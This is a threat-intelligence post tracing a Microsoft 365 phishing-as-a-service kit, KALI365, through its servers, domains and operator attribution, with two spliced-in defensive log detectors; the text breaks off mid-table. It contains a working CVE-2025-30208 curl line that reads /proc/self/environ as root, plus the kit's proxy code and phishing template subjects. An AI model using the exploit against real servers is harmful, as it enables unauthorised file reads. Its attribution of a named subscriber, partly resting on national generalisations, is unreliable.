DISCLAIMER: This investigation was conducted on behalf of a corporate client who received the phishing attack described in this post. The scope of active investigation was limited to infrastructure directly used in the attack against our client. CVE-2025-30208 was demonstrated against the attacker's server solely to identify the operator's management IP address as part of attributing the attack on our client - no data was exfiltrated, modified, or weaponized, and findings were reported immediately to the relevant abuse contacts and law enforcement channels. All unauthenticated endpoints referenced were accessed in their public capacity, equivalent to standard HTTP requests. OSINT collection was performed entirely via passive and open sources (WHOIS, certificate transparency logs, public DNS, internet-wide banner scanning platform data, publicly served web resources, sandbox analysis reports, and public threat intelligence feeds). This post is published as a threat intelligence disclosure in the public interest to assist defenders and inform takedown efforts.
A phishing email landed in an employee's inbox. SPF passed. DKIM passed. DMARC passed. Spam score: 0.085/1.0.
What started as a routine triage turned into a multi-day offensive hunt. An arbitrary file read as root on the threat actor's server led us to 9 servers across 11 operator domains, 26+ enumerated customer phishing domains, 8,561+ live victim sessions counted in real time across two independent backends, and a Starlink subscriber in Lagos, Nigeria hiding behind a previously undocumented Phishing-as-a-Service platform called KALI365.
We are not Jack Rhysider, but this is the story of a dive into a dark corner of the Internet.
1. The Email That Started Everything
The sending IP resolved to the victim firm's real email gateway. This pointed to a genuine account compromise: the attacker was sending from the firm's own infrastructure, so every authentication check passed, and correctly so. As far as the mail system was concerned, it was "legitimate" mail.
SPF: PASS (sent from firm's own relay)
DKIM: PASS (signed with firm's private key)
DMARC: PASS (policy=reject - irrelevant when the account is owned)
Spam: 0.085 / 1.0
The kill chain had three stages, each designed to defeat a specific class of detection.
Stage 1 - Instapage lure. A free-tier landing page registered approximately one hour before delivery. First-hop URL scanning sees a legitimate Instapage domain and stops. A Snowplow analytics beacon fired on page load, filtering visitors on the intended target's timezone (Europe/Zurich) and language (de-CH) before the redirect. The attacker profiled their target geographically before delivering the payload.
Stage 2 - Cloudflare Worker AiTM proxy. The redirect target was a Cloudflare Worker subdomain. Its TLS certificate was issued the day before the attack: on-demand infrastructure, less than a day old. Extracting the Worker's JavaScript revealed the complete AiTM state machine:
```javascript
const SID = "841402";
const API = "https://api.duemineral.uk:8443";
const SPATH = "/api/session/";

// Polls the KALI365 backend for the state of this phishing session.
async function pollStatus(sid) {
  const r = await fetch(`${API}${SPATH}${sid}`);
  const d = await r.json();
  // Once the backend reports the session as captured, the victim is sent on to the configured URL.
  if (d.status === "captured") redirect(d.redirect_url);
}
```
The variable API pointing to api.duemineral.uk:8443 was the thread we started pulling on.
Stage 3 - Session token theft. The Worker proxied the victim's Microsoft authentication in real time: the victim completes MFA → the attacker intercepts the post-authentication session cookie → MFA is bypassed entirely. A social-engineering instruction in the email reinforced this: "Open it in the same browser where you are logged into your email", ensuring the active session cookie was captured, not just a fresh login token.
2. Mapping the Infrastructure
Subdomain enumeration via certificate transparency logs returned 38 subdomains under duemineral.uk, all of them phishing lures for Outlook, Google Accounts, YouTube, Google Play, SharePoint and Azure AD, and all routing through Cloudflare via wildcard DNS (*.duemineral.uk).
The CDN bypass. A single DNS record broke everything:
direct.duemineral.uk. IN A 167.99.0.116
This A record pointed directly to the origin server, bypassing Cloudflare's entire WAF, DDoS protection, bot management, and rate limiting stack. Every protection - defeated with a single DNS lookup.
JS bundle reverse engineering. The compiled React 19 frontend bundle (527 KB) yielded 68 API endpoints, several of them high-value observation points for us:
POST /dash/my-worker/setup → Cloudflare Worker deploy (RCE)
POST /dash/ai-template → LLM template generation (SSTI candidate)
POST /dash/linked-domains/provision-ssl/{id} → SSL provisioning (command injection)
POST /dash/mfa/scan → MFA enumeration (SSRF candidate)
GET /dash/branding → Unauthenticated - returns theme + accent colors
GET /health → Unauthenticated - live platform metrics
POST /register → Unauthenticated - live storefront
Server fingerprint (origin 167.99.0.116, extracted passively):
OS: Ubuntu 24.04.3 LTS
Python: 3.12.3
Node.js: v20.20.2
nginx: 1.24.0 (Ubuntu)
App: Flask 3.1.8 / Gunicorn (port 5001)
Frontend: React 19.2.4 + Vite (dev server on port 3000) + TailwindCSS
Database: SQLite (WAL mode, confirmed via /health) + Redis
TLS: Self-signed wildcard *.loadingdocuments.uk (10-year validity)
Runs as: root | Working dir: /root/panel-v2/
Screen: STY=134345.panel
NODE_ENV: development ← production server running in dev mode
Shodan InternetDB on 167.99.0.116: Flask/3.1.8, Python/3.12.3, nginx - 12 CVEs flagged against this fingerprint.
The origin server ran a TCP tarpit - all 65,535 ports completed SYN handshakes but dropped data, rendering port scanning useless. Only 6 ports had real services behind them.
Threat intelligence on the domain:
- urlscan.io - duemineral.uk: 81 scans since 2026-02-28; 20+ Cloudflare Workers delivery subdomains identified; first scan: 2026-02-28
- urlscan.io - loadingdocuments.uk: 32 scans; page title "KALI365" captured on the first scan (2026-03-25), before branding was applied
- Gridinsoft - auth.duemineral.uk: blacklisted phishing, trust score 10/100
Joe Sandbox - confirmed campaigns:
| Sample | Infrastructure | Lure | Target |
|---|---|---|---|
| auth.duemineral.uk/l/G-5xTKrYcI8 | KALI365 device code | Adobe Acrobat Sign | Marubeni America Corporation |
| auth.loadingdocuments.uk/l/Oc0OuelwEt0 | KALI365 device code | SharePoint impersonation | - |
The sender in the first Joe Sandbox sample, "Katou Kenny", is of course a spoofed identity. The target was confirmed as Marubeni America Corporation (the US subsidiary of a Fortune 500 Japanese trading company).
3. CVE-2025-30208: Arbitrary File Read as Root to gain more data
Port 3000 ran a broken Vite development server. A required module chunk (dist/node/chunks/dist.js) was missing from node_modules - the module loader crashed on every request hitting the transform pipeline. But simpler file handlers remained alive.
CVE-2025-30208: the ?import&raw?? query suffix bypasses Vite's server.fs.allow path restriction. The double ?? creates a URL parsing ambiguity that the access check does not account for. The process ran as root, so every file readable by root was readable via HTTP:
```shell
curl -s "http://167.99.0.116:3000/@fs/proc/self/environ?import&raw??"
# export default "USER=root\x00SSH_CLIENT=135.129.124.63 26970 22\x00
# STY=134345.panel\x00PWD=/root/panel-v2\x00EDITOR=vi\x00
# NODE_ENV=development\x00..."
```
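For defenders who run a Vite dev server themselves, here is the detection side of the bug, as an added example that is not from the post: it walks constructed nginx access-log lines (not the incident's logs) and flags /@fs/ requests that carry the ?import&raw?? suffix or reach outside an assumed project root.

```python
import re
from urllib.parse import unquote

# Assumed project root for the Vite dev server; /@fs/ reads inside it are normal
# Vite behaviour, reads outside it are the whole point of CVE-2025-30208.
ALLOWED_ROOT = "/home/dev/app/"

# nginx "combined" log format: client, ident, user, [time], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines: two probes and two benign dev-server requests.
SAMPLE_LOG = """\
203.0.113.9 - - [08/Apr/2026:09:12:01 +0000] "GET /@fs/proc/self/environ?import&raw?? HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.9 - - [08/Apr/2026:09:12:05 +0000] "GET /%40fs/etc/hostname%3Fimport%26raw%3F%3F HTTP/1.1" 200 64 "-" "curl/8.5.0"
198.51.100.4 - - [08/Apr/2026:09:13:10 +0000] "GET /src/main.tsx HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
198.51.100.4 - - [08/Apr/2026:09:13:11 +0000] "GET /@fs/home/dev/app/src/App.tsx HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def analyze_target(target):
    """Return a finding dict for a suspicious /@fs/ request target, or None."""
    # Decode twice so percent-encoded (and doubly encoded) probe variants are matched too.
    decoded = unquote(unquote(target))
    path, _, query = decoded.partition("?")
    if not path.startswith("/@fs/"):
        return None
    fs_path = path[len("/@fs"):]          # "/@fs/proc/self/environ" -> "/proc/self/environ"
    reasons = []
    if query.startswith("import&raw") and "??" in decoded:
        reasons.append("CVE-2025-30208 '?import&raw??' bypass suffix")
    if not fs_path.startswith(ALLOWED_ROOT):
        reasons.append("/@fs/ read outside the project root")
    if not reasons:
        return None
    return {"fs_path": fs_path, "reasons": reasons}

def scan_log(text):
    """Walk access-log lines and collect findings with client IP, time and HTTP status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = analyze_target(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), **hit})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["fs_path"], "; ".join(f["reasons"]))
```

A 200 status on a flagged line means the read succeeded, which is the signal to treat the host as compromised rather than merely probed.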
/proc/self/environ - the operator was actively SSH'd in at time of extraction:
USER=root
SSH_CLIENT=135.129.124.63 26970 22 ← operator's egress IP, port, destination
STY=134345.panel ← screen session named "panel"
PWD=/root/panel-v2 ← confirmed working directory
EDITOR=vi
NODE_ENV=development
Files confirmed present on the server (path enumeration):
/root/server.py Flask source - SECRET_KEY, DB URI
/root/.ssh/id_rsa SSH private key
/root/.bash_history Full operator command history
/root/.env Environment secrets
/root/panel-v2/.env.production Production config
/etc/mongod.conf MongoDB bind/auth config
/etc/systemd/system/panel.service Service definition
4. Unauthenticated Intelligence: Live Platform Telemetry
No authentication required on either /health endpoint. Live data from both backends:
| Metric | api.duemineral.uk (main) | 162.243.166.119:5001 (second backend) |
|---|---|---|
| status | "degraded" | "healthy" |
| active_tokens | 5,941 | 2,620 |
| revoked_tokens | 1,978 | 1,764 |
| cpu.cores | 2 | 4 |
| cpu.load_1m | 4.28 (warning) | 0.0 (idle) |
| wal.size_mb | 0.0 | 0.0 |
| threads | 41 | 21 |
| schema | v1 | v2 (adds disk, memory, error_rate) |
active_tokens on the main backend increased between two readings 14 minutes apart: live campaigns in progress. wal.size_mb: 0.0 on both indicates the SQLite write-ahead log is checkpointed clean. The second backend on 162.243.166.119:5001 serves a newer health schema (v2) with additional system metrics, confirming it runs more recent KALI365 code.
Combined active stolen sessions: 5,941 + 2,620 = 8,561+ tokens across two independent databases.
/dash/branding - unauthenticated, returns operator theme config:
{"accent_color": "#ff0a3c", "panel_name": "Panel", "primary_color": "#ff0a3c", "theme": "crimson"}
... well well well let's call that destiny then...
/register - unauthenticated HTTP 200 on both backends. Live storefront, no referral required.
5. Operator Attribution
SSH Egress IP: 135.129.124.63
Reverse DNS: customer.lgosnga1.isp.starlink.com
ISP: SpaceX Services, Inc. - Starlink
ASN: AS14593 (SPACEX-STARLINK)
NetHandle: NET-135-129-124-0-1
NetName: STARLINK-863719539772915747-RW-LGOSNGA1-IPV4
CIDR: 135.129.124.0/24
Registered: 2023-06-16
BGP routing: First appeared 2023-07-26 (fully visible, 329/329 RIS peers)
NetName fully decoded:
| Segment | Meaning |
|---|---|
| STARLINK | Starlink network prefix |
| 863719539772915747 | SpaceX internal subscriber/terminal ID - maps to a specific Starlink dish and account |
| RW | Read-Write allocation (standard residential) |
| LGOSNGA1 | LaGOS, NiGeria, Accounting zone 1 - Lagos Starlink ground station node |
| IPV4 | Address family |
LGOSNGA1 = Lagos, Nigeria - authoritative geographic confirmation independent of GeoIP databases.
Geolocation cross-reference - all sources confirm Lagos:
| Source | City | Lat | Lon | Note |
|---|---|---|---|---|
| ip-api.com | Lagos, NG | 6.5243 | 3.3792 | Confirmed |
| ipinfo.io | Lagos, NG | 6.4541 | 3.3947 | Confirmed |
| Pulsedive | Lagos, NG | 6.4474 | 3.3903 | Confirmed |
| DNS hostname | - | - | - | lgosnga1 = Lagos Nigeria node 1 (authoritative) |
| AlienVault OTX | USA | 37.751 | -97.822 | Wrong - OTX uses SpaceX HQ (CA), not subscriber location |
Coordinates cluster in the Yaba / Surulere / Lagos Island corridor - central/mainland Lagos.
Threat intelligence on 135.129.124.63:
| Source | Result | Detail |
|---|---|---|
| Blocklist.de | LISTED | Added 2025-07-23; retired 2025-10-25; abuse category |
| s5h.net (all.s5h.net) | LISTED | Port scanning behavior observed against honeypots |
| Spamhaus PBL (zen.spamhaus.org) | Listed | 127.0.0.10 - consumer/residential (expected for all Starlink, not specific abuse) |
| Pulsedive | MEDIUM risk | Ingested from Blocklist.de feed; first seen 2025-07-23 |
| GreyNoise | Clean | Not observed scanning internet - consistent with SSH management use only |
| Shodan InternetDB | No data | No open ports indexed (CGNAT, expected for Starlink) |
| AlienVault OTX | Partial | HTTP probe 2025-07-23 returned HTTP 0 - no web server (SSH-only egress confirmed) |
| CIRCL Passive DNS | Clean | No records |
| crt.sh | Clean | No certificates |
| Wayback Machine | Clean | No snapshots |
Adjacent IP activity (same /24):
135.129.124.20: OTX Pulse - Mirai Telnet scan (2024-06-30) + ETIC Cybersecurity port scan (2024-07-04). Confirms the /24 block has been used by multiple subscribers, consistent with Starlink's residential pool assignment.
Intelligence timeline for 135.129.124.63:
| Date | Event |
|---|---|
| 2023-06-16 | /24 LGOSNGA1 block registered by SpaceX |
| 2023-07-26 | /23 prefix enters global BGP routing (329/329 RIS peers) |
| 2024-06-30 | Neighbor .20 - OTX Mirai Telnet scan pulse |
| 2025-07-23 | .63 first seen - Blocklist.de, Pulsedive, OTX HTTP probe |
| 2025-10-25 | Pulsedive retires IP (no recent activity observed) |
| 2025-12 | RaccoonO365 arrests - Lagos & Edo, Nigeria (Okitipi Samuel) |
| 2026-01-08 | /24 prefix appears as individual BGP route |
| 2026-04-08 | IP confirmed as KALI365 operator SSH egress via CVE-2025-30208 |
Law enforcement subpoena path: SpaceX Services, Inc., 1 Rocket Rd, Hawthorne, CA 90250. Reference NetHandle: NET-135-129-124-0-1 and subscriber ID 863719539772915747. SpaceX maps this to a specific terminal account, billing address, and physical dish location. The operator's real identity is one subpoena away.
Operator Handle: clicksideas
Infrastructure scan identified clicksideas.com resolving to the same DigitalOcean IP as the active KALI365 server (146.190.33.201). Reverse DNS on the active server points to this domain. The operator failed to isolate their personal domain from criminal infrastructure.
Domain: clicksideas.com
Registered: 2022-01-23
Registrar: Namecheap, Inc.
Nameservers: ns1/ns2/ns3.digitalocean.com
Site: WordPress blog
Author: "clicksideas" (single author)
Resolves to: 146.190.33.201 (current KALI365 production server)
Wayback Machine (earliest snapshot: 2019): clicksideas.com was a ClickBank affiliate landing page promoting "Commission Hero" by Robby Blanchard - a mass-market online money scheme. This is the classic Nigerian internet fraud pipeline: affiliate scam → skill development → PhaaS operator. Seven years from first ClickBank page to commercial PhaaS with 8,500+ active stolen sessions.
Platform Identity: KALI365
- Name confirmed: urlscan.io captured the page title "KALI365" on the first ever scan of loadingdocuments.uk/login (2026-03-25), before branding was applied
- Version confirmed: working directory /root/panel-v2/ = second major version; screen session 134345.panel
- No public designation: no Microsoft Storm-XXXX, no Proofpoint TA number, no Mandiant/CrowdStrike/Recorded Future reporting. Push Security (April 2026) catalogued duemineral.uk/loadingdocuments.uk under the internal codename "CLURE", without operator attribution or country of origin.
Domain Registration Fingerprints
We found three distinct false identity patterns across 11 operator domains:
| Pattern | Domains | Registrar |
|---|---|---|
| Nominet validation FAILED | duemineral.uk, antired.uk, loadingdocuments.uk | Cloudflare, Inc. |
| Registrant Org: "education" | sharedocpdf.work, pdfdrive.work | Cloudflare, Inc. |
| Privacy-protected / redacted | All others | NameSilo, Namecheap, Wild West Domains |
Nominet message on all three .uk domains: "Nominet was not able to match the registrant's name and/or address against a 3rd party source." Consistent, deliberate false identity across every registration.
6. Full Infrastructure: 9 Servers, 11 Domains, 2 Panel Versions
Internet-wide banner scanning using the panel's unique HTTP fingerprints expanded the known infrastructure from 2 IPs to 9:
Complete server inventory:
| IP | Provider | Ports Confirmed | Role | Status |
|---|---|---|---|---|
| 167.172.199.98 | DO Santa Clara AS14061 | 80 (nginx), 2082 (nginx), 5001 (Werkzeug dev) | Dev origin / old panel | Active |
| 134.209.55.33 | DO Santa Clara AS14061 | 8085, 8443 | Terminal v2.0 (dev/customer) | Active |
| 24.199.108.217 | DO Santa Clara AS14061 | 8085, 8443 | Terminal v2.0 / antired.uk | Active |
| 157.230.53.233 | DO North Bergen AS14061 | 80, 443, 8443 (cert 15af977c) | Old panel node | Offline |
| 162.243.166.119 | DO North Bergen AS14061 | 2082 (nginx), 5001 (gunicorn), 8443 (cert 15af977c) | Active 2nd backend | Active |
| 159.223.147.230 | DO North Bergen AS14061 | 80, 443 (cert 15af977c) | Panel node | Active |
| 167.99.0.116 | DO North Bergen AS14061 | 80, 443, 2082, 8443 - offline Apr 8 | Exploited main server | Offline |
| 146.190.33.201 | DO Santa Clara AS14061 | 22 only (tarpitted) | Current production | Active |
| 172.86.72.83 | RouterHosting/Cloudzy AS14956, Dallas TX | 8443 | New node - bulletproof host | Active |
Eight servers on DigitalOcean AS14061. One outlier: 172.86.72.83 on RouterHosting LLC (Cloudzy) - bulletproof-friendly hosting. Shared TLS certificate (SHA1: 15af977ce25de452b96affa2addb1036) confirmed across 167.99.0.116, 162.243.166.119, 157.230.53.233, 159.223.147.230 - single-operator cluster. Port 5001 (Flask/Gunicorn backend) exposed directly on 162.243.166.119 and 167.172.199.98 without nginx proxy - architectural misconfiguration mirroring the Vite dev server exposure.
Live TLS certificate extraction:
167.172.199.98:8443 → ZeroSSL, CN=panel.duemineral.uk
SHA1: 14:9B:76:03:99:9F:DD:77:86:3F:ED:DD:79:12:8E:5B:E7:25:5B:75
Issued: 2026-02-28 (duemineral.uk registration date - day one)
Expires: 2026-05-29
24.199.108.217:8443 → Let's Encrypt E7, CN=panel.antired.uk
SHA1: A5:F4:8F:6B:29:F0:C5:51:23:14:47:DC:AC:5B:08:E4:5C:41:70:B2
Issued: 2026-03-30, Expires: 2026-06-28
159.223.147.230:443 → Self-signed, CN=proxy
SHA1: 59:83:55:D0:C0:BD:D4:70:4A:53:E9:0E:64:94:39:8B:6E:CF:63:3C
Issued: 2026-04-02, Expires: 2036-03-30 (10-year)
Two Distinct Panel Versions
Crimson Panel (v1) - 3,005 bytes (or 3,001 bytes with custom branding), nginx, ports 80/443/2082. Minimal dark UI, Inter font, bright red accent #ff0a3c, footer: "AUTHORIZED PERSONNEL ONLY". The operator-facing SaaS panel. Content-length sub-variant: servers showing "KALI365" title (3,005 bytes) vs. "Panel" title (3,001 bytes) - operator-configurable panel_name field. Same FOFA body hash, 4-byte difference.
Terminal (v2.0) - 12,375 bytes, Werkzeug/Python direct, ports 8085/8443. Full hacker-terminal aesthetic: black background, #ff0033 red + #00ff41 green, JetBrains Mono + Share Tech Mono + VT323 + IBM Plex Mono, animated CRT scanlines, CSS glitch effects, @keyframes flicker + @keyframes spin. Title: KALI365 // Login. Footer: "KALI365 v2.0 // ENCRYPTED CONNECTION". Input labels: user@root / passkey / [ AUTHENTICATE ]. CSS contains full application shell (.sidebar, .stats-row, .stat-box, .card) - complete operator dashboard, not just a login page. This is the next-generation version under active development.
Third Domain - antired.uk - Discovered via TLS Pivot
Registered: 2026-03-01 (Cloudflare, Nominet FAILED)
IP: 24.199.108.217 (DigitalOcean, Santa Clara)
Subdomains (CT logs, all issued 2026-03-01):
panel.antired.uk ← operator dashboard
login.antired.uk ← phishing delivery
vn3hg.antired.uk ← campaign-specific subdomain
www.antired.uk
vn3hg - campaign-specific subdomain appearing on both vn3hg.duemineral.uk and vn3hg.antired.uk. The same campaign identifier across two separately registered domains under two different TLS certificate authorities. Near-certain cross-domain operator link.
7. Complete Domain Intelligence (11 Operator Domains)
| Domain | Registered | Registrar | Registrant Org | IP | Notes |
|---|---|---|---|---|---|
| sharedocpdf.work | 2026-02-23 | Cloudflare | "education" | 167.172.199.98 | Earliest known; react. + office. subdomains |
| pdfdrive.work | 2026-02-25 | Cloudflare | "education" | 134.209.55.33 | panel/login/acc/live subdomains |
| duemineral.uk | 2026-02-28 | Cloudflare | Nominet FAILED | 146.190.33.201 | Primary SaaS panel; 81 urlscan hits |
| antired.uk | 2026-03-01 | Cloudflare | Nominet FAILED | 24.199.108.217 | Discovered via TLS cert; vn3hg campaign link |
| loadingdocuments.uk | 2026-03-20 | Cloudflare | Nominet FAILED | 146.190.33.201 | Panel titled "KALI365" on first scan; 32 urlscan hits |
| deculvers.com | 2026-03-24 | Wild West Domains | Redacted | 172.86.72.83 (Cloudzy) | NS: NS1.BDM.MICROSOFTONLINE.COM - Microsoft-lookalike |
| creaee.online | 2026-03-25 | Namecheap | Redacted | 162.243.166.119 | Port 2082 |
| dpcusginmein.online | 2026-03-25 | Namecheap | Redacted | 162.243.166.119 | Port 2082 |
| clicksideas.com | 2022-01-23 | Namecheap | Redacted | 146.190.33.201 | Operator personal domain; WordPress; 2019 ClickBank affiliate |
8. Threat Actor Timeline
2019
└── clicksideas.com first snapshot (Wayback Machine)
ClickBank affiliate page - "Commission Hero" money scheme
Classic Nigerian internet fraud pipeline entry point
2022-01-23
└── clicksideas.com re-registered (Namecheap / DigitalOcean nameservers)
WordPress blog, author: "clicksideas"
Skill development period begins - 4 years before PhaaS launch
2026-02-23
└── sharedocpdf.work registered (Cloudflare, Org: "education")
CT certs: office.sharedocpdf.work, react.sharedocpdf.work → 167.172.199.98
→ EARLIEST KNOWN ACTIVITY - React frontend dev environment live
2026-02-25
└── pdfdrive.work registered (Cloudflare, same "education" org)
CT certs: panel, login, acc, live, account → 134.209.55.33
→ Full panel structure deployed 3 days before public launch
2026-02-27
└── Three DigitalOcean droplets spin up simultaneously
167.172.199.98, 24.199.108.217, 134.209.55.33 (all DO Santa Clara)
KALI365 v2.0 Terminal panel on ports 8085/8443
→ Final testing phase
2026-02-28
└── duemineral.uk registered (Cloudflare, Nominet FAILED)
ZeroSSL cert issued for panel.duemineral.uk → 167.172.199.98 (day one)
→ Platform goes live as commercial SaaS
2026-03-01
└── antired.uk registered (Cloudflare, Nominet FAILED)
CT certs: panel.antired.uk, login.antired.uk, vn3hg.antired.uk
→ Second delivery domain; vn3hg campaign ID bridges to duemineral.uk
2026-03-20
└── loadingdocuments.uk registered (Cloudflare, Nominet FAILED)
Self-signed wildcard *.loadingdocuments.uk - 10-year validity
panel.loadingdocuments.uk operator panel goes live
2026-03-24/25
└── deculvers.com registered (Wild West Domains)
NS: NS1.BDM.MICROSOFTONLINE.COM (Microsoft-lookalike nameservers)
creaee.online + dpcusginmein.online registered (Namecheap)
→ 162.243.166.119 (new North Bergen NJ IP) joins infrastructure
2026-03-25
└── urlscan.io first scan of loadingdocuments.uk/login
Page title captured: "KALI365" - platform name leaked before branding applied
duemineral.uk moves behind Cloudflare CDN (104.21.0.217)
www.duemineral.uk briefly on 167.172.199.98 before CF migration complete
2026-03-27 to 2026-03-31
└── Mass customer domain registrations begin (NameSilo + DNSOWL pattern):
taskflowscripts.com, myappsharepoint-doc.com, kylianiz654.com,
documentsalived.com (all Mar 27); sharehubcom.com (Mar 28);
constrnet.com, concentrateofficeguadmins.org, mscontactmembersheardliners.com,
duanemorrisadwateralchemyarchenterrureaudet.com, 00085.icu (Mar 31)
→ Customer acquisition wave; 22+ domains deployed to old server
2026-04-01 to 2026-04-07
└── infoqueer.org, sharei9s.biz (Apr 1)
159.223.147.230 gets self-signed "proxy" cert (Apr 2)
365securefiles.org registered (Apr 4)
Cloudflare Worker cert issued: web-secure-c0k3.p-4mq7w20w.workers.dev (Apr 6)
→ Day before phishing email delivery
2026-04-07
└── Phishing email delivered to victim
Invoice template, sent from compromised Sophos-relayed account
Kill chain: Instapage (profiling) → CF Worker (AiTM) → api.duemineral.uk:8443
2026-04-08 (morning)
└── CVE-2025-30208 exploitation on 167.99.0.116
/proc/self/environ read: operator SSH egress = 135.129.124.63
IP resolves to: customer.lgosnga1.isp.starlink.com → Lagos, Nigeria
2026-04-08 (evening)
└── Operator detects reconnaissance
Emergency migration: 167.99.0.116 → 146.190.33.201 (new DO droplet)
Vite dev server NOT re-exposed (understood the attack vector)
12+ API endpoints removed, partial input validation added
OpenSSH on new server: ubuntu13.13 (older than compromised server ubuntu13.15)
deculvers.com cert issued → 172.86.72.83 (RouterHosting/Cloudzy Dallas)
→ First infrastructure node outside DigitalOcean
22 customer domains left pointing at offline 167.99.0.116 - every customer dark
2026-04-10
└── Re-enumeration of new server 146.190.33.201:
api.duemineral.uk/health: 5,941 active tokens, status: degraded
/register open - $250/mo via OxaPay (no referral required)
panel.loadingdocuments.uk - operator subdomain confirmed live
159.223.147.230 - active panel node (North Bergen NJ) confirmed
2026-04-11
└── Banner scanning: 9 total IPs, 11 operator domains (was 2 known)
162.243.166.119:5001/health: 2,620 additional active tokens, status: healthy
Combined total: 8,561+ active stolen sessions across two backends
26+ customer domains enumerated; 22 orphaned on dead server
Shared cert 15af977c confirmed across 4 IPs (single-operator cluster)
deculvers.com (Cloudzy) - first non-DigitalOcean node
Earliest activity: 2026-02-23 (sharedocpdf.work)
This report published
9. The Nigerian PhaaS Ecosystem: Where KALI365 Fits
KALI365 did not emerge in isolation. It belongs to a documented and expanding ecosystem of Nigerian-operated or Nigeria-adjacent PhaaS platforms targeting Microsoft 365.
RaccoonO365 - its most direct predecessor. Operated by Okitipi Samuel (a.k.a. Moses Felix) from Lagos and Edo states in Nigeria and sold over Telegram. Microsoft seized 338 associated domains in September 2025. The Nigerian Police Force / NCCC arrested Okitipi Samuel in December 2025, which brought RaccoonO365 down. KALI365 launched in February 2026, only two months after the arrest. The IP 135.129.124.63 first appeared in threat intelligence feeds in July 2025, during the peak of RaccoonO365's operations. This is circumstantial, not conclusive, but the timing and geography fit.
EvilTokens - First documented by Sekoia TDR in March 2026. It offers device code phishing and AiTM on a subscription model with AI-generated templates; its operator handle is eviltokensadmin. Technically it diverges from KALI365: a PHP frontend (vs Python/Flask), Railway PaaS hosting (vs DigitalOcean), NOWPayments (vs OxaPay), an entry price of $1,500 then $500/month (vs $250/month), and a public Telegram channel (none found for KALI365). Different codebase, same technique class. Both moved to fill the market void left by RaccoonO365's takedown.
Storm-2372 - Named by Microsoft MSTIC (February 2025). Device code phishing, assessed as Russia-aligned and SVR-adjacent, targeting governments and diplomatic entities rather than financial gain. Technique overlap only: an entirely different operator profile and motivation.
TA2723 - Named by Proofpoint (October 2025). Financially motivated device code phishing. Country of origin unconfirmed. Active since October 2025.
SilverTerrier - Unit 42 (documented since 2014). Nigerian BEC group. No device code phishing overlap. Predates the AiTM era. Consistent TTP profile at the macro level (Nigerian origin, Microsoft targeting, consumer ISP egress).
KALI365 - unattributed, undocumented. No formal vendor designation. Push Security's April 2026 analysis of ten competing device code phishing kits catalogued this infrastructure under the internal codename "CLURE" without operator attribution or country of origin. The platform has operated for two months, collected 8,561+ victim tokens, served 26+ customer deployments, and spread across 9 servers, entirely under the radar of the major threat intelligence vendors. The 37x surge in device code phishing in early 2026 created an environment where smaller, well-operated platforms run below vendor detection thresholds, particularly without a public Telegram channel to surface them.
10. Platform Capabilities and Active Victims
Business model:
- Pricing: $250/month or $2,000/year
- Payment: OxaPay (crypto-only, no KYC), merchant ID 11153123
- Activation: OxaPay payment webhook fires → account created
- No referral code required: open registration
Phishing technique: OAuth 2.0 device code flow abuse + AiTM token theft. Server generates Microsoft device authentication codes. Victim enters code at microsoft.com/devicelogin → grants attacker a persistent OAuth refresh token. No password captured. MFA irrelevant. Token valid until revoked or expiry.
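Where the device code flow described above shows up on the defender's side, as an added example that is not from the post: it walks constructed Entra ID sign-in records (field names follow the SigninLogs schema; users, IPs and times are invented) and flags every device-code sign-in, rating it high when the redeeming country is one the user has never signed in from interactively.

```python
from collections import defaultdict

# Constructed sample sign-in records (not real logs). Field names follow the Entra ID
# SigninLogs schema; "none" is the protocol value for an ordinary interactive sign-in.
SAMPLE_SIGNINS = [
    {"createdDateTime": "2026-04-07T07:58:11Z", "userPrincipalName": "alice@example.ch",
     "authenticationProtocol": "none", "ipAddress": "198.51.100.20",
     "location": {"countryOrRegion": "CH"}},
    {"createdDateTime": "2026-04-07T09:14:02Z", "userPrincipalName": "alice@example.ch",
     "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.77",
     "location": {"countryOrRegion": "NG"}},
    {"createdDateTime": "2026-04-07T09:20:45Z", "userPrincipalName": "bob@example.ch",
     "authenticationProtocol": "deviceCode", "ipAddress": "198.51.100.21",
     "location": {"countryOrRegion": "CH"}},
    {"createdDateTime": "2026-04-07T10:02:30Z", "userPrincipalName": "carol@example.ch",
     "authenticationProtocol": "none", "ipAddress": "198.51.100.22",
     "location": {"countryOrRegion": "CH"}},
]

def baseline_countries(signins):
    """Countries each user has signed in from via ordinary (non-device-code) flows."""
    seen = defaultdict(set)
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            seen[s["userPrincipalName"]].add(s["location"]["countryOrRegion"])
    return seen

def find_device_code_signins(signins):
    """One finding per device-code sign-in. Every redemption is worth a look, since few
    organisations use the flow at all; one from a country outside the user's interactive
    baseline is rated high because the device code was most likely entered by the victim
    while the token was issued to a client somewhere else."""
    baseline = baseline_countries(signins)
    findings = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        user = s["userPrincipalName"]
        country = s["location"]["countryOrRegion"]
        known = baseline.get(user, set())
        if known and country not in known:
            severity = "high"
            note = "device code redeemed from %s; user's known countries: %s" % (
                country, ",".join(sorted(known)))
        else:
            severity = "medium"
            note = "device code flow used" + ("" if known else "; no interactive baseline for user")
        findings.append({"time": s["createdDateTime"], "user": user, "ip": s["ipAddress"],
                         "country": country, "severity": severity, "note": note})
    return findings

if __name__ == "__main__":
    for f in find_device_code_signins(SAMPLE_SIGNINS):
        print(f["severity"].upper(), f["time"], f["user"], f["ip"], f["note"])
```

Because the token stays valid until revoked, the response to a high finding is to revoke the user's sessions and refresh tokens, not only to block the IP.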
8 built-in phishing templates (extracted from React 19 JS bundle):
| Template | Subject Line |
|---|---|
| SharePoint | {{sender_name}} shared a document with you |
| OneDrive | {{sender_name}} shared a file with [[name]] via OneDrive |
| Teams | {{sender_name}} mentioned you in a Teams chat |
| Voicemail | You received a voicemail from {{sender_name}} |
